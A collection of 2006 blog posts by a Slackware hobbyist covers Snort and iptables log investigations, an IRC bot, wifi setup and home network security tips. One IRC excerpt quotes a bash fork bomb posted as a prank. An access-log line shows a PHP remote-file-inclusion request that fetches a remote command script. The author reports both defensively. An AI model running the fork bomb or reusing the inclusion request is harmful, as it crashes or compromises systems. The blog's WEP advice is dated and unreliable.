0x0030: 0229 e55d 3a60 4265 6c69 616c 216e 3d6a .).]:`Belial!n=j
0x0040: 6f65 4036 392e 3138 322e 3234 352e 3235 oe@69.182.245.25
0x0050: 3220 5052 4956 4d53 4720 2323 736c 6163 2.PRIVMSG.##slac
0x0060: 6b77 6172 6520 3a75 6964 3d31 3030 3028 kware.:uid=1000(
0x0070: 6a6f 6529 2067 6964 3d31 3030 2875 7365 joe).gid=100(use
0x0080: 7273 2920 6772 6f75 7073 3d31 3030 2875 rs).groups=100(u
0x0090: 7365 7273 292c 3130 2877 6865 656c 292c sers),10(wheel),
0x00a0: 3137 2861 7564 696f 292c 3138 2876 6964 17(audio),18(vid
0x00b0: 656f 292c 3139 2863 6472 6f6d 292c 3230 eo),19(cdrom),20
0x00c0: 2867 616d 6573 292c 3131 2866 6c6f 7070 (games),11(flopp
0x00d0: 7929 0d0a y)..

I then decided to check my IRC bot's logs, as I've an eggdrop bot logging ##slackware on irc.freenode.net. The bot logs into the server using port 6667, which is in the payload. This is what I found:

...
[20:04]  bbiab
[20:05] <`Belial> joe@GTA:~$ id
[20:05] <`Belial> uid=1000(joe) gid=100(users) groups=100(users),10(wheel),17(audio),18(video),19(cdrom),20(games),11(floppy)
[20:05] then you got something wrong with your channels (both master and pcm are unmuted, right?)
[20:06] <`Belial> yeah
...

Nice! This wouldn't have shown up in the FW logs, as I don't track IRC with iptables. Chalk this up as a false positive.

Thursday, May 11, 2006

Iptables again

During the last 3-4 days, I've been playing with Iptables:

1. I'm having an issue where my SSH sessions to wigglit.ath.cx time out. Last night, I flushed the firewall rules and left the firewall bare of rules for the night while leaving a term logged in via SSH. The session still timed out but I don't know if this is an eventual time out or something related to SSH. I don't have any rulesets related to SSH in my Iptables file (with the exception of allowing all SSH).

2. I've been testing some firewall log parsers, namely fwlogwatch and wflogs. Both are nice, but wflogs has more configuration options. Both supposedly parse Snort logs, but I haven't been able to do this with either tool. Both tools are out-dated with no activity to either project in the last few years.

3. The ##slackware bot, slackboy, doesn't start automatically when I reboot the wigglit.ath.cx server, but does throw a MSG534 error, which doesn't make sense. There's also not much Google data on this particular error, especially solutions to the issue. I've a line added in /etc/rc.d/rc.local (su ron -c /home/ron/eggdrop/eggdrop /home/ron/eggdrop/slackboy.conf) that will sometimes run and sometimes not (when I execute it manually). Today, I just ran it as a normal user in the bot's directory (eggdrop -c slackboy.conf) and it worked. Weird.

I'm also using my Linksys wifi card (the WPC54GS PCMCIA card). I've done this in the past and actually have a script that I use to initiate the card. This card has no opensource drivers so I use ndiswrapper. Here's the dmesg initiation data:

ndiswrapper version 0.11 loaded (preempt=no,smp=no)
PCI: Setting latency timer of device 03:00.0 to 64
ndiswrapper: using irq 11
wlan0: ndiswrapper ethernet device 00:0f:66:4a:42:6a using driver lsbcmnds
wlan0: encryption modes supported: WEP, WPA with TKIP, AES/CCMP
ndiswrapper: driver lsbcmnds (Cisco-Linksys ,LLC.,02/19/2004, 3.50.21.11) added

The lsbcmnds driver is a Windows driver that ndiswrapper uses. I can't use this driver for things such as Kismet, but for typical enduser type work, it is functional. I'd rather not have to buy another wifi card just to be Linux-idealistic.

I also want to be able to use WPA, but I'm only using WEP at the moment. The reason for this is that my Tivo uses wireless to pull programming data. The wifi adapter that I'm using is supported by Tivo but I don't believe it has WPA capability. This is the only thing holding me back from using WPA. The adapter is a WUSB11 v2.8. I shall double-check to see if it is WPA-capable. Even so, I'd still like to eventually get away from 11B. That's going to be hard to get away from, since Tivo only has limited support for 54G.

Sunday, May 07, 2006

Whoosh, Over His Head...

|splat| http://fuckthatjob.com/ haha
NeoSadist |splat|, http://www.getbanned.org
Half-Left lol
|splat| heh
Half-Left NeoSadist, nice :-)

-- a bit later, when I was no longer away from the keyboard, I saw it, laughed, then copy/pasted into the channel --

W|GGL|T |splat| http://fuckthatjob.com/ haha
W|GGL|T NeoSadist |splat|, http://www.getbanned.org
W|GGL|T lol!
|splat| hehe
* muteW has quit ("Exeunt muteW")
* gm152 has quit (Remote closed the connection)
thrice` getbanned.org doesn't work

Of course it doesn't work...that wasn't the point NeoSadist was trying to make..., some people just don't have common sense.

Shell Scripting | Creation of a Subnet and Securing Wireless Access Points

I've been trying to automate some things on my Linux and BSD boxes, so I've been scripting a bit lately.

For one, I like the mailed stats that FreeBSD and OpenBSD provides the administrator, so I've attempted to do the same for Slackware. I've a version that also runs on BSD, although you have to hack it to get it to work under a BSD machine. I'm currently looking over it to see if I can lessen the hacking of the script when using it on a non-Linux or non-Slackware machine, but for now it does work. It does not mail the admin yet, but it does keep a listing of stats every hour on the hour (via cron).

I've used several web-based resources to create this script:

http://www.linuxcommand.org/
http://www.freeos.com/guides/lsst/

I've also bought a few scripting books:

Unix Shells by Example, 3rd Edition, by Ellie Quigley
Linux Shell Scripting with Bash, by Ken O. Burtch
Learning the bash Shell, 2nd Edition, by Cameron Newham and Bill Rosenblatt

There's a ton of shell scripting books out there, along with a ton of free online tutorials, but the ones I've mentioned gave me the most insight.

I shall post a link to my script when I've finished working it to my liking.

I've also done a few things to my network during the last week.

I bought a Netgear VPN Firewall (FVS114). I want to play with hardware a bit and this unit was cheap. Sometime in the near future, I want to inplement a VPN tunnel from my residence to my linode. Sure, I can implement it via open-source software but I have to start delving with hardware if I want to sell myself as a professional security consultant. Anyways, I was previously utilizing a Linksys WRT54X4 Firewall/Router/WAP as my border router/gateway, which was fine where it was, but in order to utilize the Netgear to its fullest (which I plan to do), it needed to be placed at the border, so I put the Netgear in the Linksys' place. I then put the Linksys inside my LAN, as I needed it's WAP capabilities.

It took me a week to get things the way I wanted them. I wanted the Linksys on its own network, and that required creating a subnet. I opted to let it use its default network segment, 192.168.1.0/24. It pulled an IP from the Netgear (the Netgear is set up to serve IP addresses via DHCP). I was able to run a CAT5 from the Linksys to my Shuttle box and gain access to the administrative browser. Everything was going well, until I found that I couldn't ping other machines on the Linksys network segment. I spent a week trying to figure out why until I got a coworker to come over and take a look at things. He almost immediately got things working. I found that the Sygate firewall that I had installed on the Shuttle was impeding things. I turned it off and the laptop that was associated with the WAP was able to ping the Shuttle. One more problem was apparent: I wasn't able to get out to the internet on any laptop, although I could on the Shuttle. The reason? The Linksys FW was enabled. Once that was turned off, I was able to open up a browser and point it to MSN.com. Those were pretty simple solutions that any competent engineer should have been able to fix. My issue? Well, most engineers run standard tools in their work environment. I'd forgotten about the Sygate firewall, which is only installed on two of my many machines...so, its not so standard within my network environment, so it was easy to forget. That, and I was so wrapped up with getting this setup to work that I didn't check the obvious items.

All that is left now is to add a static route on the Netgear that will allow communcations from the Linksys netrange.

This is a decent setup, as you always want to segregate your WAP from your network. For home users, the basic setup is fine, but I'm not a regular home user. I want to at least TRY to do things the right way.

Now, since we're talking about WAPs, I'll let you know that I'm using WEP, the protocol that's branded 'unsecure'. Why am I using it? Because not all of my wireless devices can use the WPA protocol. Some people say that WEP is so insecure that its better off not using it...that's total B.S. You always want to use security in-depth anyways, which means you need to implement your security in layers to cover all potential weaknesses. Here's what I normally do:

1. Create a good, long password for the administrative GUI.

2. Either limit the DHCP pool to a very small amount (depending on how many wireless devices you have...I've at least 5, so I have a DHCP pool of 7), or turn off DHCP and assign your devices static IPs. This way, if someone gains access to your network, he's smart enough to get his own IP and not have it given to him. The lesson is to not make it easy to bust into your network.

3. Change your WEP key from time to time, maybe once a month. My Linksys will ask for any phrase and create 4 keys based off of that one phrase. Rotate those every once in awhile. Why do all this? The WEP key is supposedly easy to crack. A coworker of mine did attempt to crack a key. He couldn't. Many people think it is easy, but apparently its not as easy as many people say, but in case it IS easy, rotate your keys from time to time.

4. You can use MAC address authentication. Sure, someone could spoof a MAC, but remember that we're layering security...he may spoof a MAC but he won't be able to circumvent the rest of the things you've implemented.

5. Don't broadcast your SSID. Those who know how to hack will find it anyways, but what you want to worry about is the script kiddies out there and the ocassional bandwidth leech. Don't worry about the serious crackers out there, as if they wanted to pop your box, they could easily do it, with or without your basic security layering.

6. On some WAPs, you can dial down the power a bit so the wireless signal doesn't broadcast out to 2-3 blocks. Of course, when you do this, your wireless bandwidth gets throttled. Weigh the cost of this in your own mind and decide what would be best for your network. I don't throttle my signal but I do have my WAP in the basement, which does cut down on the signal. If you've a WAP on a 2nd or 3rd floor home or building, its going to be hard to throttle the signal to the point that others won't see it, since the WAP is physically on higher ground.

I may be missing a few wifi pointers, but I'll let others fill in the blanks. The above are the ways I keep my WAP and network secure. I hope you guys and gals can benefit from those tips.

Saturday, May 06, 2006

When Geeks Attack...

From ##Slackware, irc.freenode.net:

khaos <(' khaos <(' ')>
khaos (' ')>
* NeoSadist (n=robert@unaffiliated/neosadist) has joined ##slackware
* NoBIOS (n=everson@201.32.252.199) has joined ##slackware
khaos :(){ :|:& }; :
khaos ^^ cool thing to type into a terminal
* kerio2004 has quit (Read error: 113 (No route to host))
* MacIver smacks khaos
txt khaos, what a script kiddie moofart..
txt i hate you
txt fork bombs = gay...
txt people who say stupid crap like that in a linux channels with inexperienced people = moronic
lylo :/
* ChanServ gives channel operator status to NeoSadist
* NeoSadist sets ban on *!*n=heretic@*.dyn.grandenetworks.net
* NeoSadist has kicked khaos from ##slackware (NeoSadist)
* NeoSadist removes channel operator status from NeoSadist

Tuesday, May 02, 2006

Snort and IPTables

I'm at a loss at the below Snort log entry I saw today. I'm gonna assume that the originating IP (192.168.0.101) wasn't routed because its a private IP address (RFC 1918). It's nice that Snort picked up on this, but now I need to find out if iptables blocked it and if I even have iptables configured to block this sort of traffic:

[**] [1:486:4] ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
05/02-10:37:22.568564 202.142.75.186 -> 66.160.141.30
ICMP TTL:45 TOS:0x0 ID:64537 IpLen:20 DgmLen:576
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:80 -> 192.168.0.101:59420
TCP TTL:45 TOS:0x0 ID:2832 IpLen:20 DgmLen:567 DF
***AP**F Seq: 0x130787C4 Ack: 0x710438B9 Win: 0x1F21 TcpLen: 32
** END OF DUMP

Additional info --

I checked the iptables logs and saw the below:

May 2 10:37:22 ***** kernel: INVALID packet: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:b0:4a:6c:76:53:08:00 SRC=202.142.75.186 DST=66.160.141.30 LEN=576 TOS=0x00 PREC=0x00 TTL=45 ID=64537 PROTO=ICMP TYPE=3 CODE=10 [SRC=66.160.141.30 DST=192.168.0.101 LEN=567 TOS=0x00 PREC=0x00 TTL=45 ID=2832 DF PROTO=TCP SPT=80 DPT=59420 WINDOW=7969 RES=0x00 ACK PSH FIN URGP=0 ]

So, the firewall saw it. The question is, what did it do with the traffic. I'll do a search on "invalid" and "iptables".

End Results --

I found the below using "iptables -L" to see if I have blocking of private addresses implemented, to prevent spoofing:

DROP all -- 192.168.0.0/16 anywhere

This was a nice investigation! :-) This is proof that firewall and IDS correlation helps a LOT in investigating strangeness.

Tuesday, April 25, 2006

wigglit.ath.cx and linode.com

I've a server that is hosted by Linode.com at wigglit.ath.cx . It runs Slackware. Linode.com lets you install prepackaged images of various distributions. Its very stable and I run multiple services on this machine, buy mainly serve web pages.

I've IPTables implemented, along with Snort.

Today, I checked my Snort logs and saw the below:

[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
04/25-04:08:55.986986 125.243.112.130:57953 -> 66.160.141.30:80
TCP TTL:52 TOS:0x0 ID:10968 IpLen:20 DgmLen:680 DF
***AP*** Seq: 0x80425805 Ack: 0xC7958537 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1905554218 12987212

I could have checked the actual payload of this specific event but I was a bit lazy and decided to check the web logs instead. I'm seasoned enough as a security analyst to know that this was probably the typical attack on php-based services running on a webserver, but I wanted to see what actually happened to trigger this event, so I went to my web logs and grepped for the IP:

root@starchild:/var/log/apache# cat access_log | grep '125.243.112.130'
125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/PNphpBB2/includes/functions_admin.php
?phpbb_root_path=http://www.linuxsystems.go.ro/cmd.txt?&cmd HTTP/1.0" 404 333

I know this attack wasn't successful for two reasons:

1. I don't have PHP on this server.
2. I don't have a PHP-based content management system installed.
3. I observed a '404' within that log entry.

This attack was most likely either a worm (lupper or lupper-based) or someone that wasn't quite smart enough to know that I wasn't running php-based services. It/he/she was attempting to get into the administrative interface and possibly deface the website.

I wget'd the below from http://www.linuxsystems.go.ro/cmd.txt, which is what the attacker tried to apparently upload to my machine:

[I'll add the content when I can figure out how to add the code without blogger.com attempting to process it...and besides, I'm at work now.]

This is nasty stuff here, if your machine isn't hardened.

Wednesday, March 29, 2006

Slackware v11.0 Preorder

Slackware is offering Slackware v11.0 for preorder. This probably means that v11.0 will be released to the public soon. I'm still running a version of Slackware-current that is a few months out-of-date, but my goal is to update to the latest soon, so I can be as current as possible for v11.0 (not that it makes a real difference).

Also, for those of you that don't update your Slackware installation much, you need to become familiar with this page: Slackware's Security Advisiories.


Lastly, for you guys and gals who want to run firewalls on your machines, I've finally put got IPTABLES running on Wigglit.ath.cx, using Arno's Firewall Script. This script is very intuitive and you can customize it to your server's needs. I highly recommend at least giving the script a try.